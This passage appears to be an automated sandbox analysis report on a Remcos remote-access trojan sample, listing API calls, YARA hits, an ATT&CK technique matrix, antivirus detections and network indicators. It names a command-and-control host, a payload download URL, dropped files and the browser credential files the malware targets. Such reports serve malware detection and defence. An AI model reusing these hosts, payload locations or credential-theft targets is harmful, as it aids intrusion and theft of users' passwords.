                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_0044EEB8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_049304BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_04930588
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_049266AC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_0493003B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,9_2_048EF053
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_0493028B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_049303B4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_0492FC50
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0492FEC8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0492FFAE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,9_2_0492FF13
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,9_2_04926BB4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_0044F17B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_0044F130
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_0044F216
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F2A3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,13_2_0040E2BB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_0044F4F3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_0044F61C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_0044F723
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_0044F7F0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_00445914
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_00445E1C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_0044EEB8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_06D766AC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_06D804BB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_06D80588
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_06D8028B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_06D803B4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,13_2_06D3F053
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_06D8003B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_06D7FEC8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_06D7FFAE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,13_2_06D7FF13
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_06D7FC50
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,13_2_06D76BB4
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB921C GetLocalTime,0_2_02EB921C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004195F8 GetUserNameW,9_2_004195F8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_004466BF
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EBB79C GetVersionExA,0_2_02EBB79C
                  Source: C:\Windows\SysWOW64\SndVol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040A953
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040A953
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040AA71
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db9_2_0040AA71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040AA71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db13_2_0040AA71

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91ZJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91ZJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7091998.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d31998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe9_2_0040567A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe13_2_0040567A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  1
                  Deobfuscate/Decode Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Windows Service
                  11
                  Access Token Manipulation
                  2
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Remote Access Software
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  1
                  Timestomp
                  NTDS1
                  System Network Connections Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script422
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  File and Directory Discovery
                  SSHKeylogging213
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Registry Run Keys / Startup Folder
                  211
                  Masquerading
                  Cached Domain Credentials45
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Valid Accounts
                  DCSync241
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                  Virtualization/Sandbox Evasion
                  Proc Filesystem2
                  Virtualization/Sandbox Evasion
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow3
                  Process Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                  Process Injection
                  Network Sniffing11
                  Application Window Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  System Owner/User Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562867 Sample: 1m181Ru74o.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 54 craekuro.duckdns.org 2->54 56 aarzoomarine.com 2->56 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 68 12 other signatures 2->68 8 1m181Ru74o.exe 1 6 2->8         started        13 Ntmftfld.PIF 2->13         started        15 Ntmftfld.PIF 2->15         started        signatures3 66 Uses dynamic DNS services 54->66 process4 dnsIp5 58 aarzoomarine.com 103.101.59.23, 443, 49705, 49706 INPL-IN-APIshansNetworkIN India 8->58 44 C:\Users\Public44tmftfld.url, MS 8->44 dropped 46 C:\Users\Public\Libraries46tmftfld, data 8->46 dropped 82 Writes to foreign memory regions 8->82 84 Allocates memory in foreign processes 8->84 86 Creates a thread in another existing process (thread injection) 8->86 88 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->88 17 SndVol.exe 2 3 8->17         started        22 cmd.exe 1 8->22         started        24 esentutl.exe 2 8->24         started        90 Antivirus detection for dropped file 13->90 92 Multi AV Scanner detection for dropped file 13->92 94 Machine Learning detection for dropped file 13->94 26 colorcpl.exe 2 13->26         started        96 Injects a PE file into a foreign processes 15->96 28 colorcpl.exe 15->28         started        file6 signatures7 process8 dnsIp9 52 craekuro.duckdns.org 172.111.212.138, 1950, 49723, 49776 IOMART-ASGB United States 17->52 40 C:\ProgramData\remcos\logs.dat, data 17->40 dropped 70 Detected Remcos RAT 17->70 72 Contains functionalty to change the wallpaper 17->72 74 Contains functionality to steal Chrome passwords or cookies 17->74 76 Contains functionality to register a low level keyboard hook 17->76 30 esentutl.exe 2 22->30         started        34 esentutl.exe 2 22->34         started        36 conhost.exe 22->36         started        42 C:\Users\Public\Libraries42tmftfld.PIF, PE32 24->42 dropped 38 conhost.exe 24->38         started        78 Contains functionality to steal Firefox passwords or cookies 26->78 80 Delayed program exit found 26->80 file10 signatures11 process12 file13 48 C:\Users\Public\alpha.pif, PE32 30->48 dropped 98 Drops PE files to the user root directory 30->98 100 Drops PE files with a suspicious file extension 30->100 102 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 30->102 50 C:\Users\Public\xpha.pif, PE32 34->50 dropped signatures14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  1m181Ru74o.exe66%ReversingLabsWin32.Backdoor.Remcos
                  1m181Ru74o.exe83%VirustotalBrowse
                  1m181Ru74o.exe100%AviraTR/AD.Nekark.ykcgg
                  1m181Ru74o.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\Ntmftfld.PIF100%AviraTR/AD.Nekark.ykcgg
                  C:\Users\Public\Libraries\Ntmftfld.PIF100%Joe Sandbox ML
                  C:\Users\Public\Libraries\Ntmftfld.PIF66%ReversingLabsWin32.Backdoor.Remcos
                  C:\Users\Public\alpha.pif0%ReversingLabs
                  C:\Users\Public\xpha.pif0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://crl.mJ0%Avira URL Cloudsafe
                  https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfc100%Avira URL Cloudmalware
                  craekuro.duckdns.org0%Avira URL Cloudsafe
                  https://aarzoomarine.com/owa100%Avira URL Cloudphishing
                  https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc100%Avira URL Cloudphishing
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  aarzoomarine.com
                  103.101.59.23
                  truetrue
                    unknown
                    craekuro.duckdns.org
                    172.111.212.138
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://aarzoomarine.com/wp-content/plugins/231_Ntmftfldhfctrue
                      • Avira URL Cloud: malware
                      unknown
                      craekuro.duckdns.orgtrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl01m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://geoplugin.net/json.gpSndVol.exe, colorcpl.exefalse
                          high
                          http://crl.mJ1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://sectigo.com/CPS01m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl01m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.sectigo.com01m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                http://geoplugin.net/json.gp/CSndVol.exe, 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    http://www.microsoft.co1m181Ru74o.exe, 00000000.00000002.1424747239.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://aarzoomarine.com:443/wp-content/plugins/231_Ntmftfldhfc1m181Ru74o.exe, 00000000.00000002.1424747239.0000000000684000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
